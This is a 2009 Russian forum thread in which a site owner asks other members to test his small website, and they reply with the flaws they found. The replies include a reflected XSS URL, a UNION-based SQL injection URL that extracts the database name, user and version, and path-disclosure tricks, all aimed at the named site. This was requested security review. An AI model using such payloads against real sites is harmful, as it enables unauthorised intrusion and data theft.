 |
Маленький проект проверьте |
13.11.2009, 05:09
|
|
Познающий
Регистрация: 01.06.2009
Сообщений: 38
С нами:
8917832
Репутация:
2
|
|
Маленький проект проверьте
Проверьте пожалуйста http://wakko.ru/
Гостевую, регистрацию и востановление пароля.
Спасибо.
|
|
|
13.11.2009, 15:53
|
|
Участник форума
Регистрация: 29.03.2005
Сообщений: 138
С нами:
11114426
Репутация:
129
|
|
Ошибка обработки оператора LIMIT в MySQL
http://wakko.ru/index.php?cstart=-2&do=book&act=1
Не особо страшно, но все же не фильтруется
Раскрытие путей при подмене сессии:
Код:
Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /путь/index.php on line 3
Подмена заголовков,поле User-Agent
Последний раз редактировалось [NiGHT]DarkAngel; 13.11.2009 в 17:02..
|
|
|
|
13.11.2009, 21:51
|
|
Познающий
Регистрация: 01.06.2009
Сообщений: 38
С нами:
8917832
Репутация:
2
|
|
Ошибка обработки оператора LIMIT в MySQL
http://wakko.ru/index.php?cstart=-2&do=book&act=1
Исправил. Спасибо.
Раскрытие путей при подмене сессии:
А как избавлиться т этого можно?
|
|
|
|
07.12.2009, 03:28
|
|
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
С нами:
9709737
Репутация:
88
|
|
XSS
http://wakko.ru/?do=members&orderby=1<script>alert(12345)</script>
|
|
|
|
07.12.2009, 05:29
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
С нами:
10024314
Репутация:
739
|
|
SQL inj
http://wakko.ru/index.php?do=profile&name=administratorrrr'+union+ select+1,concat_ws(0x3a,database(),user(),version( )),3,4,5,6,7,8,9,10,11,12--+
раскрытие путей
http://wakko.ru/index.php?do=profile&name[]=administrator
|
|
|
|
07.12.2009, 07:32
|
|
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
С нами:
11278406
Репутация:
818
|
|
Сообщение от Wakko
А как избавлиться т этого можно?
Поставить собачку перед сессион_старт в 3й строке.
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [NiGHT]DarkAngel](/avatars/avatar15948.jpg?1685263){kind=avatar}
Похожие темы
Линейный вид
